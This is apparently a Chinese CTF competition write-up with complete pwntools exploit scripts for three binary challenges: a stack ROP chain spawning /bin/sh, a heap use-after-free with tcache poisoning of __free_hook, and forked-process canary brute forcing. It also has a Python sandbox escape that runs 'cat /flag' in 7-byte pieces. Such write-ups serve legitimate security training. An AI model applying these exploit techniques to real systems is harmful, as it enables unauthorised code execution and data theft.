做出了4道题,3道PWN和1道Misc。

排名不靠前,希望能有机会进分区赛(

这里就只贴自己打出的题了

PWN

烧烤摊儿

整数溢出,栈溢出

# -*- coding: UTF-8 -*-
from pwn import *

# Connection to the challenge instance recorded in the write-up.
io = remote('39.106.71.184', 37247)
context.binary = 'shaokao'


def sd(x):
    """Send raw bytes to the service."""
    return io.send(x)


def sl(x):
    """Send bytes followed by a newline."""
    return io.sendline(x)


def sla(a, b):
    """Wait for prompt a, then send b with a trailing newline."""
    return io.sendlineafter(a, b)


def ia():
    """Hand the connection over to the user."""
    return io.interactive()

def menu(choice):
    """Answer the '> ' menu prompt with the option number rendered as text."""
    option_text = str(choice)
    sla('> ', option_text)

# --- integer overflow step ---------------------------------------------------
menu(1)
sla('3. 勇闯天涯\n', '1')
# 4294767296 == 2**32 - 200000.  The write-up labels this an integer overflow,
# so presumably the quantity is truncated to 32 bits on the server side and
# ends up as a wrapped value — confirm against the binary.
sl('4294767296')
menu(4)

# Gadgets inside 'shaokao' itself (presumably statically linked: all addresses
# sit in the binary's own range and a bare syscall gadget is available).
syscall = 0x00000000004230a6
pop_rdi = 0x000000000040264f
pop_rsi = 0x000000000040a67e
pop_rdx = 0x00000000004a404b   # two values follow it below, so it presumably pops a second register too
pop_rax = 0x0000000000458827

# --- stack overflow step -----------------------------------------------------
menu(5)
# x86-64 syscall chain, read straight off the register assignments:
#   rax=0    -> read(0, buf, 0x30): pull a string into an address inside the binary
#   rax=0x3b -> execve(buf, 0, 0)
rop_chain = flat([
    pop_rdi,
    0,
    pop_rsi,
    0x00000000004E82C0 + 0x300,   # buf: assumed to be a writable region of the binary
    pop_rdx,
    0x30, 0,
    pop_rax,
    0,
    syscall,
    pop_rdi,
    0x00000000004E82C0 + 0x300,
    pop_rsi,
    0,
    pop_rdx,
    0, 0,
    pop_rax,
    0x3b,
    syscall
])
# The chain starts 0x28 bytes into the overflowed buffer — presumably the
# distance to the saved return address.
sl(flat({0x28: rop_chain}))
# Consumed by the read() above; becomes the execve path.
sd('/bin/sh\x00')
ia()

StrangeTalkBot

UAF

# -*- coding: UTF-8 -*-
from pwn import *

# Connection and the libc the challenge ships with (2.31).
io = remote('123.56.251.120', 30889)
context.binary = 'pwn'
libc = ELF('libc-2.31.so', checksec = False)


def rc(n):
    """Receive exactly n bytes (as far as pwntools delivers them)."""
    return io.recv(n)


def sa(a, b):
    """Wait for prompt a, then send b without a newline."""
    return io.sendafter(a, b)


def ia():
    """Hand the connection over to the user."""
    return io.interactive()


def uu64(x):
    """Unpack up to 8 leaked bytes as a little-endian u64, zero-padding on the right."""
    padded = x.ljust(8, '\x00')
    return u64(padded)


def libc_os(x):
    """Absolute address of libc offset x (libc_base is a global set after the leak)."""
    return libc_base + x


def heap_os(x):
    """Absolute address of heap offset x (heap_base is a global set after the leak)."""
    return heap_base + x


def libc_sym(x):
    """Absolute address of libc symbol x."""
    return libc_os(libc.sym[x])

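def varint(n):
    """Encode a non-negative int as a base-128 varint (little-endian groups of 7 bits).

    Every output byte carries seven payload bits; the high bit is set on all
    bytes except the last.  This is the protobuf varint wire format.

    Args:
        n: non-negative integer to encode.

    Returns:
        bytes with the encoding; always at least one byte (varint(0) == b"\\x00").

    Raises:
        ValueError: if n is negative — zigzag-map signed values first (see zz()).
    """
    if n < 0:
        raise ValueError("varint() expects a non-negative integer, got %r" % (n,))
    out = bytearray()
    while True:
        group = n & 0x7F
        n >>= 7
        if n:
            # More groups follow: set the continuation bit.
            out.append(group | 0x80)
        else:
            out.append(group)
            return bytes(out)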

def zz(n):
    """Zigzag-map a signed 64-bit int to unsigned and varint-encode it.

    Non-negative values become even and negative values odd
    (0 -> 0, -1 -> 1, 1 -> 2, ...), so varint() only ever sees n >= 0.
    """
    # (n >> 63) is 0 for non-negative n and all ones for negative n.
    sign_mask = n >> 63
    mapped = (n << 1) ^ sign_mask
    return varint(mapped)

def add(msg_idx, size, content):
    """Send an "add" request (op 2) creating message msg_idx with the given size and content.

    Wire layout: 0x08 <op> 0x10 <idx> 0x18 <size> 0x22 <len> <content>.  The
    tag bytes look like protobuf field tags (1-3 varint, 4 length-delimited)
    but that is not confirmed here.  The length is a single chr() byte, which
    is fine for every caller in this script (longest payload is 13 * 8 bytes).
    """
    idx_enc = zz(msg_idx)
    size_enc = zz(size)
    request = ''.join([
        '\x08\x02',
        '\x10', idx_enc,
        '\x18', size_enc,
        '\x22', chr(len(content)), content,
    ])
    sa('You can try to have friendly communication with me now: \n', request)

def delete(msg_idx):
    """Send a "delete" request (op 8) for message msg_idx; size and content are dummies."""
    idx_enc = zz(msg_idx)
    dummy_size = zz(1)
    request = ''.join([
        '\x08\x08',
        '\x10', idx_enc,
        '\x18', dummy_size,
        '\x22', chr(1), 'a',
    ])
    sa('You can try to have friendly communication with me now: \n', request)

def show(msg_idx):
    """Send a "show" request (op 6) for message msg_idx; size and content are dummies."""
    idx_enc = zz(msg_idx)
    dummy_size = zz(1)
    request = ''.join([
        '\x08\x06',
        '\x10', idx_enc,
        '\x18', dummy_size,
        '\x22', chr(1), 'a',
    ])
    sa('You can try to have friendly communication with me now: \n', request)

def edit(msg_idx, size, content):
    """Send an "edit" request (op 4) rewriting message msg_idx with size and content.

    Same wire layout as add(); the single chr() length byte limits content to
    what fits in one byte, which every caller here respects.
    """
    idx_enc = zz(msg_idx)
    size_enc = zz(size)
    request = ''.join([
        '\x08\x04',
        '\x10', idx_enc,
        '\x18', size_enc,
        '\x22', chr(len(content)), content,
    ])
    sa('You can try to have friendly communication with me now: \n', request)

# --- heap setup and leaks ----------------------------------------------------
# Ten 0xf0-byte messages, then free the first eight.  With libc 2.31 the
# tcache bin for one size holds seven chunks, so the eighth free presumably
# goes to the unsorted bin — that is what leaves a libc pointer readable below.
for i in range(0xa):
    add(i, 0xf0, 'junk')
for i in range(8):
    delete(i)
# A small message read straight back: presumably carved from the unsorted
# chunk, whose fd/bk still point into libc.  The 'a' clobbers the pointer's
# low byte; 0x61 == ord('a') is also the low byte of the recorded address,
# so the subtraction already accounts for it.
add(0xa, 0x7, 'a')
show(0xa)
libc_base = uu64(rc(6)) - (0x7f643a39fb61 - 0x7f643a1b3000)
# Index 1 was freed above; reading it through its old index (the UAF the
# write-up names) yields a heap pointer — a tcache link, presumably.
show(1)
heap_base = uu64(rc(6)) - (0x558ebc274310 - 0x558ebc274000)

# Every "0x55.. - 0x55.." / "0x7f.. - 0x7f.." below is (address - base) as seen
# in a debugger run; only the difference is used, so the differing bases are fine.
open_addr = libc_sym('open')
write_addr = libc_sym('write')
read_addr = libc_sym('read')
leave = libc_os(0x00000000000578c8)         # used as a stack pivot below (leave; ret assumed)
pop_rdi = libc_os(0x0000000000023b6a)
pop_rsi = libc_os(0x000000000002601f)
pop_rdx_r12 = libc_os(0x0000000000119211)   # two values follow it in rop_chain1
rop_addr = heap_os(0x55a7d4e78760 - 0x55a7d4e78000)
rop_addr1 = heap_os(0x55edb3551000 - 0x55edb3550000)
flag_addr = heap_os(0x55a6c5922bb0 - 0x55a6c5922000 + 0x10)   # +0x10 == offset of 'flag\0' in pld
fh_addr = libc_sym('__free_hook')

# Stage 1: open(<heap path>, 0); then rdi=3 / rsi=buffer and pivot (leave) into stage 2.
rop_chain = flat([
    rop_addr1 - 8,     # becomes rbp, so the trailing leave lands on rop_chain1
    pop_rdi,
    heap_os(0x55d2fefa6550 - 0x55d2fefa5000),   # path string on the heap (assumed to be the 'flag' below)
    pop_rsi,
    0,                 # flags: O_RDONLY
    open_addr,
    pop_rdi,
    3,                 # fd returned by open(), assuming 0-2 are taken
    pop_rsi,
    heap_os(0x100),    # buffer for the file contents
    leave,
])
# Stage 2: read(3, buf, 0x30) then write(1, buf, 0x30).
rop_chain1 = flat([
    pop_rdx_r12,
    0x30,
    0,
    read_addr,
    pop_rdi,
    1,
    write_addr
])
# Frame handed to the free-hook gadget: pointer/leave pairs that chain into
# rop_chain, with the 'flag' path at +0x10 (which is what flag_addr points at).
pld = flat({
    0: rop_addr,
    0x8: leave,
    0x10: 'flag\x00',
    0x18: flag_addr - 0x10,
    0x28: leave,
    0x48: flag_addr - 0x10
})
add(0xb, 0xf0, pld)
edit(0x3, 0xf0, rop_chain)    # index 3 was freed above: a write-after-free
edit(0x9, 0xf0, rop_chain1)   # index 9 is still live; rop_addr1 comes from the debugger session

# --- tcache poisoning: place a gadget in __free_hook -------------------------
add(0xc, 0xf0, 'junk')
delete(0xc)
edit(0xc, 0xf0, flat(fh_addr))   # overwrite the freed chunk's next pointer
add(0xd, 0xf0, 'a')              # takes chunk 0xc back off the bin
gadget = libc_os(0x0000000000154DEA)   # libc gadget the pld frame is laid out for; its semantics are not recoverable here — check in a disassembler
add(0xe, 0xf0, flat(gadget))     # presumably served from __free_hook itself, writing the gadget there
delete(0xb)                      # free(pld chunk) -> hook -> gadget -> the chains above
ia()

funcanary

子进程爆破

# -*- coding: UTF-8 -*-
from pwn import *

# Connection plus the local copy of the challenge binary.
io = remote('47.94.206.10', 18332)
context.binary = 'funcanary'
elf = ELF('funcanary', checksec = False)


def ru(x):
    """Receive up to delimiter x; the delimiter itself is dropped."""
    return io.recvuntil(x, drop = True)


def sd(x):
    """Send raw bytes to the service."""
    return io.send(x)


def sa(a, b):
    """Wait for prompt a, then send b without a newline."""
    return io.sendafter(a, b)


def sla(a, b):
    """Wait for prompt a, then send b with a trailing newline."""
    return io.sendlineafter(a, b)


def ia():
    """Hand the connection over to the user."""
    return io.interactive()


def uu64(x):
    """Unpack up to 8 leaked bytes as a little-endian u64, zero-padding on the right."""
    padded = x.ljust(8, '\x00')
    return u64(padded)

# Byte-at-a-time canary recovery.  The write-up calls this "child-process
# brute force": presumably the service forks per request, so every child
# carries the same canary and a wrong guess only terminates that child.
canary = ''
while len(canary) < 8:
    recv_d = ''
    for i in range(0, 0xff + 1):
        # Known prefix plus one candidate byte.
        canary1 = canary
        canary1 += chr(i)
        # Everything up to offset 0x68 is zero filler; the guess lands on the canary slot.
        pld = flat({0x68: canary1}, filler = '\x00')
        sa('welcome\n', pld)
        recv_d = ru('\n')
        # A wrong byte trips the stack protector and its message contains
        # "stack"; any reply without it means the byte was right.
        # Note: after a hit the for-loop carries on with the longer prefix
        # starting at i + 1; the while-loop restarts from 0 if that finds nothing.
        if 'stack' not in recv_d:
            canary += chr(i)
            if len(canary) == 8:
                break

# Partial overwrite of the return address: the lowest byte stays 0x2e and the
# next byte is tried over 0x02, 0x12, ..., 0xf2 (16 guesses — only its high
# nibble varies, the low nibble presumably being fixed by the page offset).
for i in range(0x02, 0xf2 + 0x10, 0x10):
    pld = flat({
        0x68: canary,              # recovered canary keeps the protector quiet
        0x78: '\x2e' + chr(i)      # 0x68 + 8 (canary) + 8 (saved rbp): the return address slot, presumably
    })
    sd(pld)
    # Short timeout: a wrong guess presumably kills that child and nothing comes back.
    data = io.recv(timeout = 0.25)
    if 'flag' in data:
        print data
        break
ia()

捡了个3血(

Misc

pyshell

一次最多只能输入7字节的数据,因此用脚本把要执行的代码分成几次输入拼出

# The two statements that the chunked sends in the script below reassemble.
import os
os.system('cat /flag')

即可

# -*- coding: UTF-8 -*-
from pwn import *
import time
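context.log_level = 'debug'
# "nc HOST PORT" as copied from the challenge page; only host and port are used.
_, host, port = "nc 123.57.248.214 17297".strip().split()
port = int(port)
io = remote(host, port)
# The remote shell accepts at most 7 bytes per input (see the note above the
# script), so `import os` / `os.system('cat /flag')` is delivered in pieces
# of at most 7 bytes, one per ">>" prompt; the remote side presumably
# concatenates them before evaluating.
for piece in ['import ', 'os\n', 'os.syst', 'em(\'cat', ' /flag\'', ')']:
    io.sendafter(">>", piece)
io.interactive()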